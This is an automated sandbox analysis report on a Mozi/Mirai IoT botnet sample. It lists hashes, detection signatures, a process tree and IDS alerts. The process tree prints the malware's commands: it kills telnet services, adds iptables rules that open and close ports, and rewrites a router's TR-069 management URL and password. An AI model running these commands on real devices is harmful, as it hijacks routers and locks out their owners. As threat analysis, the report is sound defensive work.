Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Mozi.m.elf

Overview

General Information

Sample name:Mozi.m.elf
Analysis ID:1572834
MD5:9bc075b91bc1088c6e230facc6510824
SHA1:45e936d0278b04663b9375337b2d21afb44c361f
SHA256:18e3658c5f62ef2fcd76b0ec25243d979741bf640a76513f121b40a83399a511
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1572834
Start date and time:2024-12-11 00:42:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Mozi.m.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/486@73/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: Mozi.m.elf
Command:/tmp/Mozi.m.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
  • system is lnxubuntu20
  • Mozi.m.elf (PID: 6226, Parent: 6151, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Mozi.m.elf
    • Mozi.m.elf New Fork (PID: 6228, Parent: 6226)
      • Mozi.m.elf New Fork (PID: 6230, Parent: 6228)
        • sh (PID: 6232, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6240, Parent: 6232)
          • killall (PID: 6240, Parent: 6232, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m.elf New Fork (PID: 6268, Parent: 6230)
          • sh (PID: 6284, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPT"
            • sh New Fork (PID: 6286, Parent: 6284)
            • iptables (PID: 6286, Parent: 6284, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPT
          • sh (PID: 6291, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPT"
            • sh New Fork (PID: 6293, Parent: 6291)
            • iptables (PID: 6293, Parent: 6291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPT
          • sh (PID: 6294, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPT"
            • sh New Fork (PID: 6300, Parent: 6294)
            • iptables (PID: 6300, Parent: 6294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPT
          • sh (PID: 6303, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPT"
            • sh New Fork (PID: 6305, Parent: 6303)
            • iptables (PID: 6305, Parent: 6303, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPT
          • sh (PID: 6306, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 41913 -j ACCEPT"
            • sh New Fork (PID: 6311, Parent: 6306)
            • iptables (PID: 6311, Parent: 6306, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 41913 -j ACCEPT
          • sh (PID: 6312, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPT"
            • sh New Fork (PID: 6317, Parent: 6312)
            • iptables (PID: 6317, Parent: 6312, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPT
          • sh (PID: 6318, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPT"
            • sh New Fork (PID: 6320, Parent: 6318)
            • iptables (PID: 6320, Parent: 6318, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPT
          • sh (PID: 6321, Parent: 6268, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPT"
            • sh New Fork (PID: 6323, Parent: 6321)
            • iptables (PID: 6323, Parent: 6321, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPT
        • sh (PID: 6329, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6333, Parent: 6329)
          • iptables (PID: 6333, Parent: 6329, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 6335, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6337, Parent: 6335)
          • iptables (PID: 6337, Parent: 6335, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 6340, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6342, Parent: 6340)
          • iptables (PID: 6342, Parent: 6340, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 6361, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 6366, Parent: 6361)
          • iptables (PID: 6366, Parent: 6361, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 6367, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 6369, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 6371, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 6373, Parent: 6371)
          • iptables (PID: 6373, Parent: 6371, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 6374, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 6376, Parent: 6374)
          • iptables (PID: 6376, Parent: 6374, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 6377, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 6382, Parent: 6377)
          • iptables (PID: 6382, Parent: 6377, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 6383, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 6388, Parent: 6383)
          • iptables (PID: 6388, Parent: 6383, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 6389, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 6394, Parent: 6389)
          • iptables (PID: 6394, Parent: 6389, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 6395, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 6400, Parent: 6395)
          • iptables (PID: 6400, Parent: 6395, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 6401, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 6406, Parent: 6401)
          • iptables (PID: 6406, Parent: 6401, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 6407, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 6412, Parent: 6407)
          • iptables (PID: 6412, Parent: 6407, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 6413, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 6418, Parent: 6413)
          • iptables (PID: 6418, Parent: 6413, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 6419, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 6423, Parent: 6419)
          • iptables (PID: 6423, Parent: 6419, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 6425, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 6430, Parent: 6425)
          • iptables (PID: 6430, Parent: 6425, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 6431, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 6436, Parent: 6431)
          • iptables (PID: 6436, Parent: 6431, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 6441, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28674 -j ACCEPT"
          • sh New Fork (PID: 6443, Parent: 6441)
          • iptables (PID: 6443, Parent: 6441, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 28674 -j ACCEPT
        • sh (PID: 6444, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPT"
          • sh New Fork (PID: 6448, Parent: 6444)
          • iptables (PID: 6448, Parent: 6444, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPT
        • sh (PID: 6451, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPT"
          • sh New Fork (PID: 6456, Parent: 6451)
          • iptables (PID: 6456, Parent: 6451, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPT
        • sh (PID: 6457, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPT"
          • sh New Fork (PID: 6459, Parent: 6457)
          • iptables (PID: 6459, Parent: 6457, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPT
        • sh (PID: 6460, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 28674 -j ACCEPT"
          • sh New Fork (PID: 6462, Parent: 6460)
          • iptables (PID: 6462, Parent: 6460, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 28674 -j ACCEPT
        • sh (PID: 6463, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28674 -j ACCEPT"
          • sh New Fork (PID: 6465, Parent: 6463)
          • iptables (PID: 6465, Parent: 6463, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 28674 -j ACCEPT
        • sh (PID: 6466, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPT"
          • sh New Fork (PID: 6468, Parent: 6466)
          • iptables (PID: 6468, Parent: 6466, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPT
        • sh (PID: 6469, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPT"
          • sh New Fork (PID: 6474, Parent: 6469)
          • iptables (PID: 6474, Parent: 6469, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPT
  • dash New Fork (PID: 6239, Parent: 4331)
  • rm (PID: 6239, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWu
  • dash New Fork (PID: 6241, Parent: 4331)
  • rm (PID: 6241, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWu
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Mozi.m.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    Mozi.m.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.m.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Mozi.m.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Mozi.m.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
          • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  /usr/networksLinux_Trojan_Mirai_5c62e6b2unknownunknown
                  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  6226.1.00007fd22c060000.00007fd22c06a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                    6226.1.00007fd22c060000.00007fd22c06a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                      6228.1.00007fd22c060000.00007fd22c06a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                        6228.1.00007fd22c060000.00007fd22c06a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                          6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                            Click to see the 17 entries
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-11T00:42:57.848142+010020292151Attempted Administrator Privilege Gain192.168.2.234790213.239.19.8680TCP
                            2024-12-11T00:43:06.285876+010020292151Attempted Administrator Privilege Gain192.168.2.2345140124.39.196.188080TCP
                            2024-12-11T00:43:06.322100+010020292151Attempted Administrator Privilege Gain192.168.2.2348522178.51.3.12880TCP
                            2024-12-11T00:43:06.391167+010020292151Attempted Administrator Privilege Gain192.168.2.2342494221.40.54.22180TCP
                            2024-12-11T00:43:07.286423+010020292151Attempted Administrator Privilege Gain192.168.2.233503861.237.100.818080TCP
                            2024-12-11T00:43:07.288236+010020292151Attempted Administrator Privilege Gain192.168.2.2349094192.135.140.13580TCP
                            2024-12-11T00:43:07.288959+010020292151Attempted Administrator Privilege Gain192.168.2.2360168220.15.89.1080TCP
                            2024-12-11T00:43:07.290776+010020292151Attempted Administrator Privilege Gain192.168.2.235820229.105.29.15980TCP
                            2024-12-11T00:43:07.301306+010020292151Attempted Administrator Privilege Gain192.168.2.2338568211.70.46.518080TCP
                            2024-12-11T00:43:07.302397+010020292151Attempted Administrator Privilege Gain192.168.2.234299414.232.148.19380TCP
                            2024-12-11T00:43:07.304205+010020292151Attempted Administrator Privilege Gain192.168.2.235933634.57.137.15380TCP
                            2024-12-11T00:43:07.309294+010020292151Attempted Administrator Privilege Gain192.168.2.2341766179.117.226.19480TCP
                            2024-12-11T00:43:07.311481+010020292151Attempted Administrator Privilege Gain192.168.2.2333938202.202.168.648080TCP
                            2024-12-11T00:43:07.315110+010020292151Attempted Administrator Privilege Gain192.168.2.2344056191.251.39.308080TCP
                            2024-12-11T00:43:07.325038+010020292151Attempted Administrator Privilege Gain192.168.2.2354768171.2.151.10880TCP
                            2024-12-11T00:43:07.328718+010020292151Attempted Administrator Privilege Gain192.168.2.2340804102.112.159.15980TCP
                            2024-12-11T00:43:07.329456+010020292151Attempted Administrator Privilege Gain192.168.2.2359574103.183.65.21780TCP
                            2024-12-11T00:43:07.332415+010020292151Attempted Administrator Privilege Gain192.168.2.2341712180.236.218.2238080TCP
                            2024-12-11T00:43:07.344983+010020292151Attempted Administrator Privilege Gain192.168.2.2349554179.171.182.1198080TCP
                            2024-12-11T00:43:07.349763+010020292151Attempted Administrator Privilege Gain192.168.2.233900622.236.52.2398080TCP
                            2024-12-11T00:43:07.355315+010020292151Attempted Administrator Privilege Gain192.168.2.2344314173.120.168.2398080TCP
                            2024-12-11T00:43:07.358215+010020292151Attempted Administrator Privilege Gain192.168.2.234498693.22.239.4880TCP
                            2024-12-11T00:43:07.360768+010020292151Attempted Administrator Privilege Gain192.168.2.2339328213.56.209.19380TCP
                            2024-12-11T00:43:07.361506+010020292151Attempted Administrator Privilege Gain192.168.2.235267878.160.226.2198080TCP
                            2024-12-11T00:43:07.364771+010020292151Attempted Administrator Privilege Gain192.168.2.2336960211.174.66.23980TCP
                            2024-12-11T00:43:07.365857+010020292151Attempted Administrator Privilege Gain192.168.2.2338360140.124.226.1888080TCP
                            2024-12-11T00:43:07.368389+010020292151Attempted Administrator Privilege Gain192.168.2.2346238174.204.37.1558080TCP
                            2024-12-11T00:43:07.369121+010020292151Attempted Administrator Privilege Gain192.168.2.234232084.150.50.20980TCP
                            2024-12-11T00:43:07.371665+010020292151Attempted Administrator Privilege Gain192.168.2.2359510142.96.19.19280TCP
                            2024-12-11T00:43:07.382550+010020292151Attempted Administrator Privilege Gain192.168.2.234044021.244.144.8680TCP
                            2024-12-11T00:43:07.384722+010020292151Attempted Administrator Privilege Gain192.168.2.236074828.144.199.558080TCP
                            2024-12-11T00:43:07.387272+010020292151Attempted Administrator Privilege Gain192.168.2.2336224124.74.74.1148080TCP
                            2024-12-11T00:43:07.387676+010020292151Attempted Administrator Privilege Gain192.168.2.2347786210.135.157.1080TCP
                            2024-12-11T00:43:07.388357+010020292151Attempted Administrator Privilege Gain192.168.2.2354236136.34.183.280TCP
                            2024-12-11T00:43:07.390899+010020292151Attempted Administrator Privilege Gain192.168.2.2339016123.244.144.20880TCP
                            2024-12-11T00:43:07.391272+010020292151Attempted Administrator Privilege Gain192.168.2.2353766161.185.149.3280TCP
                            2024-12-11T00:43:08.920578+010020292151Attempted Administrator Privilege Gain192.168.2.2333840197.215.52.3180TCP
                            2024-12-11T00:43:17.322033+010020292151Attempted Administrator Privilege Gain192.168.2.234789057.137.146.12480TCP
                            2024-12-11T00:43:18.288047+010020292151Attempted Administrator Privilege Gain192.168.2.2344310191.118.66.1488080TCP
                            2024-12-11T00:43:18.288794+010020292151Attempted Administrator Privilege Gain192.168.2.234850687.186.17.24380TCP
                            2024-12-11T00:43:18.292874+010020292151Attempted Administrator Privilege Gain192.168.2.234056253.197.184.6480TCP
                            2024-12-11T00:43:18.293620+010020292151Attempted Administrator Privilege Gain192.168.2.2333368150.143.19.21080TCP
                            2024-12-11T00:43:18.293980+010020292151Attempted Administrator Privilege Gain192.168.2.2335442145.145.175.508080TCP
                            2024-12-11T00:43:18.295480+010020292151Attempted Administrator Privilege Gain192.168.2.2343934136.165.68.16080TCP
                            2024-12-11T00:43:18.297687+010020292151Attempted Administrator Privilege Gain192.168.2.2360202169.70.235.2038080TCP
                            2024-12-11T00:43:18.298058+010020292151Attempted Administrator Privilege Gain192.168.2.234148828.130.196.1418080TCP
                            2024-12-11T00:43:18.299164+010020292151Attempted Administrator Privilege Gain192.168.2.2334504203.246.201.1788080TCP
                            2024-12-11T00:43:18.300261+010020292151Attempted Administrator Privilege Gain192.168.2.235380245.210.95.2188080TCP
                            2024-12-11T00:43:18.302485+010020292151Attempted Administrator Privilege Gain192.168.2.2352460199.190.42.21680TCP
                            2024-12-11T00:43:18.304321+010020292151Attempted Administrator Privilege Gain192.168.2.233540431.125.159.698080TCP
                            2024-12-11T00:43:18.305072+010020292151Attempted Administrator Privilege Gain192.168.2.2358762110.215.176.19680TCP
                            2024-12-11T00:43:18.312419+010020292151Attempted Administrator Privilege Gain192.168.2.235561475.28.78.16780TCP
                            2024-12-11T00:43:18.314288+010020292151Attempted Administrator Privilege Gain192.168.2.2346104167.95.195.488080TCP
                            2024-12-11T00:43:18.316791+010020292151Attempted Administrator Privilege Gain192.168.2.233581019.207.169.638080TCP
                            2024-12-11T00:43:18.319381+010020292151Attempted Administrator Privilege Gain192.168.2.235499234.251.227.11780TCP
                            2024-12-11T00:43:18.319738+010020292151Attempted Administrator Privilege Gain192.168.2.235576627.155.160.778080TCP
                            2024-12-11T00:43:18.326403+010020292151Attempted Administrator Privilege Gain192.168.2.2346048206.101.86.388080TCP
                            2024-12-11T00:43:18.327502+010020292151Attempted Administrator Privilege Gain192.168.2.2343694155.188.212.1168080TCP
                            2024-12-11T00:43:18.328243+010020292151Attempted Administrator Privilege Gain192.168.2.234662688.168.89.21380TCP
                            2024-12-11T00:43:18.328607+010020292151Attempted Administrator Privilege Gain192.168.2.2360616204.174.148.4880TCP
                            2024-12-11T00:43:18.334154+010020292151Attempted Administrator Privilege Gain192.168.2.2359530129.247.169.17780TCP
                            2024-12-11T00:43:18.334896+010020292151Attempted Administrator Privilege Gain192.168.2.2347966189.212.174.22280TCP
                            2024-12-11T00:43:18.335665+010020292151Attempted Administrator Privilege Gain192.168.2.233528675.198.60.3680TCP
                            2024-12-11T00:43:18.337158+010020292151Attempted Administrator Privilege Gain192.168.2.2358478170.154.175.2268080TCP
                            2024-12-11T00:43:18.349027+010020292151Attempted Administrator Privilege Gain192.168.2.233397889.81.235.16180TCP
                            2024-12-11T00:43:18.349769+010020292151Attempted Administrator Privilege Gain192.168.2.233714893.127.201.1668080TCP
                            2024-12-11T00:43:18.353836+010020292151Attempted Administrator Privilege Gain192.168.2.2342762115.67.171.1128080TCP
                            2024-12-11T00:43:18.357542+010020292151Attempted Administrator Privilege Gain192.168.2.233847094.38.108.17480TCP
                            2024-12-11T00:43:18.358271+010020292151Attempted Administrator Privilege Gain192.168.2.2338804136.184.13.21680TCP
                            2024-12-11T00:43:18.360539+010020292151Attempted Administrator Privilege Gain192.168.2.2345944156.233.225.1578080TCP
                            2024-12-11T00:43:18.368755+010020292151Attempted Administrator Privilege Gain192.168.2.2341742139.126.200.2218080TCP
                            2024-12-11T00:43:18.371343+010020292151Attempted Administrator Privilege Gain192.168.2.23367944.241.28.428080TCP
                            2024-12-11T00:43:18.372817+010020292151Attempted Administrator Privilege Gain192.168.2.2346108211.91.199.1668080TCP
                            2024-12-11T00:43:18.379487+010020292151Attempted Administrator Privilege Gain192.168.2.2348098123.107.138.3380TCP
                            2024-12-11T00:43:18.386112+010020292151Attempted Administrator Privilege Gain192.168.2.2353412118.186.226.11980TCP
                            2024-12-11T00:43:18.387203+010020292151Attempted Administrator Privilege Gain192.168.2.235152250.156.95.16080TCP
                            2024-12-11T00:43:18.390562+010020292151Attempted Administrator Privilege Gain192.168.2.235652831.78.106.1288080TCP
                            2024-12-11T00:43:21.338964+010020292151Attempted Administrator Privilege Gain192.168.2.2356374173.185.234.380TCP
                            2024-12-11T00:43:28.340317+010020292151Attempted Administrator Privilege Gain192.168.2.234052821.59.139.6480TCP
                            2024-12-11T00:43:28.376866+010020292151Attempted Administrator Privilege Gain192.168.2.235734674.54.233.2378080TCP
